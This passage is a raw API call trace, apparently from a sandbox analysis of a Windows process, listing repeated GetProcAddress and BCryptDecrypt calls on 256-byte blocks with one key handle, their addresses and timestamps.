cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20658ff, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20658ff, pcbResult=0x14f8fc) returned 0x0 [0179.301] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.301] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea30d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20659f4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20659f4, pcbResult=0x14f8fc) returned 0x0 [0179.304] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.304] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea31d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2065ae9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2065ae9, pcbResult=0x14f8fc) returned 0x0 [0179.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.306] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea32d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2065bde, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2065bde, pcbResult=0x14f8fc) returned 0x0 [0179.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.308] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea33d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2065cd3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2065cd3, pcbResult=0x14f8fc) returned 0x0 [0179.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.310] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea34d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2065dc8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2065dc8, pcbResult=0x14f8fc) returned 0x0 [0179.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.312] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea35d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2065ebd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2065ebd, pcbResult=0x14f8fc) returned 0x0 [0179.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.314] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea36d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2065fb2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2065fb2, pcbResult=0x14f8fc) returned 0x0 [0179.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.316] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea37d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20660a7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20660a7, pcbResult=0x14f8fc) returned 0x0 [0179.318] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.318] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea38d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206619c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206619c, pcbResult=0x14f8fc) returned 0x0 [0179.320] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.320] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea39d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2066291, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2066291, pcbResult=0x14f8fc) returned 0x0 [0179.322] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.322] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea3ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2066386, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2066386, pcbResult=0x14f8fc) returned 0x0 [0179.324] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.324] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea3bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206647b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206647b, pcbResult=0x14f8fc) returned 0x0 [0179.326] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.326] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea3cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2066570, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2066570, pcbResult=0x14f8fc) returned 0x0 [0179.328] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.328] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea3dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2066665, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2066665, pcbResult=0x14f8fc) returned 0x0 [0179.330] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.330] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea3ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206675a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206675a, pcbResult=0x14f8fc) returned 0x0 [0179.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.457] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea3fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206684f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206684f, pcbResult=0x14f8fc) returned 0x0 [0179.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.459] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea40d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2066944, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2066944, pcbResult=0x14f8fc) returned 0x0 [0179.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.460] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea41d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2066a39, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2066a39, pcbResult=0x14f8fc) returned 0x0 [0179.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.461] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea42d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2066b2e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2066b2e, pcbResult=0x14f8fc) returned 0x0 [0179.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.463] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea43d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2066c23, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2066c23, pcbResult=0x14f8fc) returned 0x0 [0179.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.464] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea44d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2066d18, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2066d18, pcbResult=0x14f8fc) returned 0x0 [0179.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.465] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea45d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2066e0d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2066e0d, pcbResult=0x14f8fc) returned 0x0 [0179.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.467] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea46d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2066f02, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2066f02, pcbResult=0x14f8fc) returned 0x0 [0179.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.468] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea47d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2066ff7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2066ff7, pcbResult=0x14f8fc) returned 0x0 [0179.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.470] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea48d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20670ec, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20670ec, pcbResult=0x14f8fc) returned 0x0 [0179.471] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.471] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea49d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20671e1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20671e1, pcbResult=0x14f8fc) returned 0x0 [0179.472] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.472] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea4ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20672d6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20672d6, pcbResult=0x14f8fc) returned 0x0 [0179.474] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.474] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea4bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20673cb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20673cb, pcbResult=0x14f8fc) returned 0x0 [0179.475] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.475] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea4cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20674c0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20674c0, pcbResult=0x14f8fc) returned 0x0 [0179.476] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.476] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea4dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20675b5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20675b5, pcbResult=0x14f8fc) returned 0x0 [0179.481] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.481] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea4ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20676aa, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20676aa, pcbResult=0x14f8fc) returned 0x0 [0179.482] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.482] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea4fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206779f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206779f, pcbResult=0x14f8fc) returned 0x0 [0179.483] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.483] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea50d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2067894, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2067894, pcbResult=0x14f8fc) returned 0x0 [0179.485] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.485] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea51d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2067989, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2067989, pcbResult=0x14f8fc) returned 0x0 [0179.486] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.486] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea52d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2067a7e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2067a7e, pcbResult=0x14f8fc) returned 0x0 [0179.487] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.488] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea53d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2067b73, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2067b73, pcbResult=0x14f8fc) returned 0x0 [0179.489] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.489] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea54d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2067c68, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2067c68, pcbResult=0x14f8fc) returned 0x0 [0179.491] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.491] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea55d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2067d5d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2067d5d, pcbResult=0x14f8fc) returned 0x0 [0179.493] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.494] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea56d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2067e52, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2067e52, pcbResult=0x14f8fc) returned 0x0 [0179.496] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.496] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea57d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2067f47, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2067f47, pcbResult=0x14f8fc) returned 0x0 [0179.497] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.628] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea58d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206803c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206803c, pcbResult=0x14f8fc) returned 0x0 [0179.631] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.631] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea59d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2068131, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2068131, pcbResult=0x14f8fc) returned 0x0 [0179.633] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.633] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea5ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2068226, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2068226, pcbResult=0x14f8fc) returned 0x0 [0179.635] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.635] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea5bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206831b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206831b, pcbResult=0x14f8fc) returned 0x0 [0179.637] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.637] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea5cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2068410, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2068410, pcbResult=0x14f8fc) returned 0x0 [0179.640] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.640] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea5dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2068505, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2068505, pcbResult=0x14f8fc) returned 0x0 [0179.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.642] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea5ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20685fa, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20685fa, pcbResult=0x14f8fc) returned 0x0 [0179.643] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.644] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea5fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20686ef, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20686ef, pcbResult=0x14f8fc) returned 0x0 [0179.645] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.646] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea60d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20687e4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20687e4, pcbResult=0x14f8fc) returned 0x0 [0179.647] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.647] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea61d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20688d9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20688d9, pcbResult=0x14f8fc) returned 0x0 [0179.652] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.652] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea62d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20689ce, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20689ce, pcbResult=0x14f8fc) returned 0x0 [0179.654] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.654] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea63d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2068ac3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2068ac3, pcbResult=0x14f8fc) returned 0x0 [0179.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.656] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea64d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2068bb8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2068bb8, pcbResult=0x14f8fc) returned 0x0 [0179.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.659] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea65d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2068cad, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2068cad, pcbResult=0x14f8fc) returned 0x0 [0179.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.661] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea66d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2068da2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2068da2, pcbResult=0x14f8fc) returned 0x0 [0179.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.662] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea67d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2068e97, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2068e97, pcbResult=0x14f8fc) returned 0x0 [0179.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.664] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea68d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2068f8c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2068f8c, pcbResult=0x14f8fc) returned 0x0 [0179.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.831] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea69d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069081, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2069081, pcbResult=0x14f8fc) returned 0x0 [0179.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.834] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea6ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2069176, cbOutput=0xf5, 